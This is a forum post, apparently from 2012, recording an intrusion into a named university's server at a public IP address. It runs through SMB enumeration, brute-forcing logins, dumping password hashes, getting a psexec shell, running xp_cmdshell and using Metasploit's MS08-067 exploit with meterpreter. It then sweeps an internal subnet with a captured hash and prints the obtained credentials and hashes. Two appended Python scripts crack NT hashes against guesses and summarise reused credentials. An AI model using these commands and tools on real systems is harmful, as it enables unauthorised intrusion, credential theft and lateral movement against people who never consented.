nmap+msf intrusion of Guangxi Normal University

OP
Posted on 2012-12-4 12:46:42
Guangxi Normal University website: http://202.103.242.241/

root@bt:~# nmap -sS -sV 202.103.242.241

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00048s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE       VERSION
135/tcp  open  mstask        Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds  Microsoft Windows 2000 microsoft-ds
1025/tcp open  mstask        Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
1026/tcp open  msrpc         Microsoft Windows RPC
3372/tcp open  msdtc?
3389/tcp open  ms-term-serv?
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
SF-Port3372-TCP:V=5.59BETA1%I=7%D=2/28%Time=4F4CDC90%P=i686-pc-linux-gnu%r
SF:(GetRequest,6,"hO\n\x000Z")%r(RTSPRequest,6,"hO\n\x000Z")%r(HTTPOptions
SF:,6,"hO\n\x000Z")%r(Help,6,"hO\n\x000Z")%r(SSLSessionReq,6,"hO\n\x000Z")
SF:%r(FourOhFourRequest,6,"hO\n\x000Z")%r(LPDString,6,"hO\n\x000Z")%r(SIPO
SF:ptions,6,"hO\n\x000Z");
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
Service Info: OS: Windows

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 79.12 seconds

root@bt:/usr/local/share/nmap/scripts# ls -la | grep smb   // list the SMB scan scripts
-rw-r--r-- 1 root root 44055 2011-07-09 07:36 smb-brute.nse
-rw-r--r-- 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse
-rw-r--r-- 1 root root  4806 2011-07-09 07:36 smb-enum-domains.nse
-rw-r--r-- 1 root root  3475 2011-07-09 07:36 smb-enum-groups.nse
-rw-r--r-- 1 root root  7958 2011-07-09 07:36 smb-enum-processes.nse
-rw-r--r-- 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse
-rw-r--r-- 1 root root  6014 2011-07-09 07:36 smb-enum-shares.nse
-rw-r--r-- 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse
-rw-r--r-- 1 root root  1658 2011-07-09 07:36 smb-flood.nse
-rw-r--r-- 1 root root  2906 2011-07-09 07:36 smb-os-discovery.nse
-rw-r--r-- 1 root root 61005 2011-07-09 07:36 smb-psexec.nse
-rw-r--r-- 1 root root  4362 2011-07-09 07:36 smb-security-mode.nse
-rw-r--r-- 1 root root  2311 2011-07-09 07:36 smb-server-stats.nse
-rw-r--r-- 1 root root 13719 2011-07-09 07:36 smb-system-info.nse
-rw-r--r-- 1 root root  1429 2011-07-09 07:36 smbv2-enabled.nse

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-enum-users.nse 202.103.242.241
// use the script to enumerate the account names that exist on the remote machine

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00038s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-enum-users:
|_  Domain: PG-F289F9A8EF3E; Users: Administrator, Guest, test, TsInternetUser   // scan result

Nmap done: 1 IP address (1 host up) scanned in 1.09 seconds

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-enum-shares.nse 202.103.242.241
// list the shares

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00035s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-enum-shares:
|   ADMIN$
|     Anonymous access: <none>
|   C$
|     Anonymous access: <none>
|   IPC$
|_    Anonymous access: READ

Nmap done: 1 IP address (1 host up) scanned in 1.05 seconds
root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-brute.nse 202.103.242.241
// obtain user passwords

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00041s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-brute:
|   administrator:<blank> => Login was successful
|_  test:123456 => Login was successful

Nmap done: 1 IP address (1 host up) scanned in 28.22 seconds
root@bt:~# wget http://swamp.foofus.net/fizzgig/ ... -exe-only.tar.bz2   // grab the hashes
root@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data
root@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse
root@bt:~# nmap --script=smb-pwdump.nse --script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,139

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.0012s latency).
PORT    STATE SERVICE
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-pwdump:
| Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************
| Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************
| test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
|_TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2

Nmap done: 1 IP address (1 host up) scanned in 1.85 seconds

C:\Documents and Settings\Administrator\桌面>psexec.exe \\202.103.242.241 -u test -p 123456 -e cmd.exe   // get a cmd shell

PsExec v1.55 - Execute processes remotely
Copyright (C) 2001-2004 Mark Russinovich
Sysinternals - www.sysinternals.com

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

C:\WINNT\system32>ipconfig

Windows 2000 IP Configuration

Ethernet adapter Local Area Connection:

Connection-specific DNS Suffix  . :
IP Address. . . . . . . . . . . . : 202.103.242.241
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 202.103.1.1

C:\Documents and Settings\Administrator\桌面\osql>osql.exe -S 202.103.242.241 -U sa -P "123456" -Q "exec master..xp_cmdshell 'net user'"   // log in remotely as sa and run a command
root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-check-vulns.nse 202.103.242.241   // check the target for vulnerabilities

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00046s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-check-vulns:
|_  MS08-067: VULNERABLE

Nmap done: 1 IP address (1 host up) scanned in 1.43 seconds
root@bt:~# msfconsole   // exploit the MS08-067 overflow on the target from msf

msf > search ms08
msf > use exploit/windows/smb/ms08_067_netapi
msf  exploit(ms08_067_netapi) > show options
msf  exploit(ms08_067_netapi) > set RHOST 202.103.242.241
msf  exploit(ms08_067_netapi) > show payloads
msf  exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
msf  exploit(ms08_067_netapi) > exploit
meterpreter >
Background session 2? [y/N]  (ctrl+z)
msf  exploit(ms08_067_netapi) > sessions -l
root@bt:/usr/local/share/nmap/scripts# vim usernames.txt
test
administrator

root@bt:/usr/local/share/nmap/scripts# vim password.txt
44EFCE164AB921CAAAD3B435B51404EE

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-brute.nse --script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254
// try logging into the whole internal subnet with the usernames and the captured hash

Nmap scan report for 192.168.1.105
Host is up (0.00088s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-brute:
|_  administrator:<blank> => Login was successful

Attack successful: a simple msf+nmap attack~~
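The smb-pwdump stage of the post dumps four LM:NT pairs from a Windows 2000 host. Before any cracking, the hash format itself already says a lot: pwdump's NO PASSWORD marker means the account has an empty password, a stored LM hash means LM hashing was never disabled, and an LM hash whose second half is AAD3B435B51404EE (the LM hash of an all-padding 7-byte half) means the password is at most 7 characters. An NT hash is just MD4 over the UTF-16LE password with no salt, so a guess can be confirmed directly. The Python below is an added example, not code from the original post: it parses the post's four lines rewritten into pwdump6's colon format, reports what the formats give away, and checks each NT hash against a guessed candidate list (the candidate list is an assumption). MD4 is written out inline because hashlib's md4 is frequently unavailable under OpenSSL 3.

```python
"""Triage of pwdump-style hash output (user:rid:LM:NT:::) as produced by pwdump6 / smb-pwdump."""
import struct

MASK = 0xFFFFFFFF
NO_PASSWORD = "NO PASSWORD*********************"    # pwdump6 prints this in place of an empty hash
LM_EMPTY_HALF = "AAD3B435B51404EE"                   # LM hash of an all-padding 7-byte half
NT_EMPTY = "31D6CFE0D16AE931B73C59D7E0C089C0"         # MD4("") = NT hash of the empty password

# Constructed sample: the four accounts from the post, rewritten into pwdump6's colon format.
SAMPLE_DUMP = """\
Administrator:500:NO PASSWORD*********************:NO PASSWORD*********************:::
Guest:501:NO PASSWORD*********************:NO PASSWORD*********************:::
test:1002:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4:::
TsInternetUser:1000:A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2:::
"""


def _lrot(x, n):
    return ((x << n) | (x >> (32 - n))) & MASK


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4, written out because hashlib's md4 is frequently missing under OpenSSL 3."""
    a0, b0, c0, d0 = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    msg = bytearray(data) + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)          # pad to 56 mod 64 ...
    msg += struct.pack("<Q", (8 * len(data)) & 0xFFFFFFFFFFFFFFFF)   # ... then 64-bit LE bit length
    f = lambda x, y, z: (x & y) | (~x & z)
    g = lambda x, y, z: (x & y) | (x & z) | (y & z)
    h = lambda x, y, z: x ^ y ^ z
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = a0, b0, c0, d0
        for i in range(16):                                             # round 1
            a = _lrot((a + f(b, c, d) + x[i]) & MASK, (3, 7, 11, 19)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):                                             # round 2
            k = (i % 4) * 4 + i // 4
            a = _lrot((a + g(b, c, d) + x[k] + 0x5A827999) & MASK, (3, 5, 9, 13)[i % 4])
            a, b, c, d = d, a, b, c
        for i, k in enumerate((0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)):  # round 3
            a = _lrot((a + h(b, c, d) + x[k] + 0x6ED9EBA1) & MASK, (3, 9, 11, 15)[i % 4])
            a, b, c, d = d, a, b, c
        a0, b0, c0, d0 = (a0 + a) & MASK, (b0 + b) & MASK, (c0 + c) & MASK, (d0 + d) & MASK
    return struct.pack("<4I", a0, b0, c0, d0)


def nt_hash(password: str) -> str:
    """NT hash = MD4 over the UTF-16LE encoding of the password; no salt, so guesses compare directly."""
    return md4(password.encode("utf-16-le")).hex().upper()


def parse_pwdump(text: str):
    """Parse user:rid:lm:nt lines; the trailing ':::' pwdump6 appends is ignored."""
    rows = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        parts = line.split(":")
        if len(parts) < 4:
            raise ValueError(f"not a pwdump line: {line!r}")
        rows.append({"user": parts[0], "rid": int(parts[1]),
                     "lm": parts[2].upper(), "nt": parts[3].upper()})
    return rows


def triage(rows, candidates):
    """What the hash format alone gives away, plus a check of each NT hash against guessed passwords."""
    report = {}
    for r in rows:
        findings = []
        if r["nt"] in (NO_PASSWORD, NT_EMPTY):
            findings.append("empty password")
        else:
            if r["lm"] not in (NO_PASSWORD, LM_EMPTY_HALF * 2):
                findings.append("LM hash stored (LM not disabled)")
                if r["lm"].endswith(LM_EMPTY_HALF):
                    findings.append("password is at most 7 characters")
            for pw in candidates:                      # candidate list is an assumption for the example
                if nt_hash(pw) == r["nt"]:
                    findings.append(f"NT hash matches candidate {pw!r}")
                    break
        report[r["user"]] = findings
    return report


if __name__ == "__main__":
    for user, findings in triage(parse_pwdump(SAMPLE_DUMP), ["password", "123456"]).items():
        print(f"{user:15} {'; '.join(findings) or 'nothing obvious from the hash alone'}")
```

Run against the post's values this confirms what smb-brute had already found by guessing: Administrator and Guest have empty passwords, and the test account's NT hash is exactly MD4(UTF-16LE("123456")); TsInternetUser's LM hash has a non-padding second half, so that password is longer than 7 characters and nothing in the short candidate list matches it.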
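The last stage of the post runs smb-brute across the whole 192.168.1.0/24 range with a username list and the captured LM hash as the "password", and reads the one success off the screen. Over a real subnet that output runs to hundreds of hosts, and the point of the sweep is to see which credential works where and whether the same one is accepted on several machines. The Python below is an added example, not code from the original post: it parses nmap's normal output for smb-brute successes, groups them by credential, tells a blank password, a plain password and an accepted hash (pass-the-hash, no cracking needed) apart, and flags any credential reused across hosts. The sweep output it runs on is a constructed sample in nmap's format, not a capture from the post.

```python
"""Summarise smb-brute successes from an nmap sweep and flag credentials reused across hosts."""
import re
from collections import defaultdict

# "Nmap scan report for 192.168.1.105" or "Nmap scan report for bogon (202.103.242.241)"
HOST_RE = re.compile(r"^Nmap scan report for (?:.+ \()?(\d{1,3}(?:\.\d{1,3}){3})\)?$")
# "|   administrator:<blank> => Login was successful" / "|_  test:123456 => Login was successful"
LOGIN_RE = re.compile(r"^\|[_ ]\s+(?P<user>[^:]+):(?P<secret>.*?) => Login was successful")
HEX32_RE = re.compile(r"^[0-9A-Fa-f]{32}$")

# Constructed sample sweep output (not from the post): two hosts accept the blank administrator
# password, one of them also accepts the test account via its LM hash, a third accepts nothing.
SAMPLE_SWEEP = """\
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 01:00 CST
Nmap scan report for 192.168.1.105
Host is up (0.00088s latency).
PORT     STATE SERVICE
445/tcp  open  microsoft-ds

Host script results:
| smb-brute:
|_  administrator:<blank> => Login was successful

Nmap scan report for 192.168.1.120
Host is up (0.0011s latency).
PORT     STATE SERVICE
445/tcp  open  microsoft-ds

Host script results:
| smb-brute:
|   administrator:<blank> => Login was successful
|_  test:44EFCE164AB921CAAAD3B435B51404EE => Login was successful

Nmap scan report for 192.168.1.130
Host is up (0.0010s latency).
PORT     STATE SERVICE
445/tcp  open  microsoft-ds

Nmap done: 254 IP addresses (3 hosts up) scanned in 120.00 seconds
"""


def parse_smb_brute(output: str):
    """Map each (user, secret) that logged in successfully to the set of hosts that accepted it."""
    hits = defaultdict(set)
    host, in_brute = None, False
    for line in output.splitlines():
        m = HOST_RE.match(line)
        if m:
            host, in_brute = m.group(1), False
            continue
        if line.startswith("| smb-brute:"):
            in_brute = True
            continue
        if not in_brute:
            continue
        if not line.startswith("|"):            # left the host-script block entirely
            in_brute = False
            continue
        m = LOGIN_RE.match(line)
        if m and host:
            hits[(m.group("user").strip(), m.group("secret").strip())].add(host)
        if line.startswith("|_"):               # "|_" marks the last line of this script's output
            in_brute = False
    return hits


def classify(hits):
    """One finding per credential: what kind of secret it was and whether it worked on several hosts."""
    findings = []
    for (user, secret), hosts in sorted(hits.items()):
        if secret == "<blank>":
            kind = "blank"
        elif HEX32_RE.match(secret):
            kind = "hash"        # smb-brute accepted the hash itself: pass-the-hash, no cracking needed
        else:
            kind = "password"
        findings.append({"user": user, "secret": secret, "kind": kind,
                         "hosts": sorted(hosts), "reused": len(hosts) > 1})
    return findings


if __name__ == "__main__":
    for f in classify(parse_smb_brute(SAMPLE_SWEEP)):
        print(f"{f['user']:15} {f['kind']:8} {','.join(f['hosts']):32} {'REUSED' if f['reused'] else ''}")
```

Feeding it real sweep output (`nmap -oN sweep.txt ...`, then `parse_smb_brute(open("sweep.txt").read())`) gives the per-credential view the post reads by eye; the "reused" flag is the finding that matters on a defender's report, since a blank or shared local administrator password is what turns one compromised host into the whole segment.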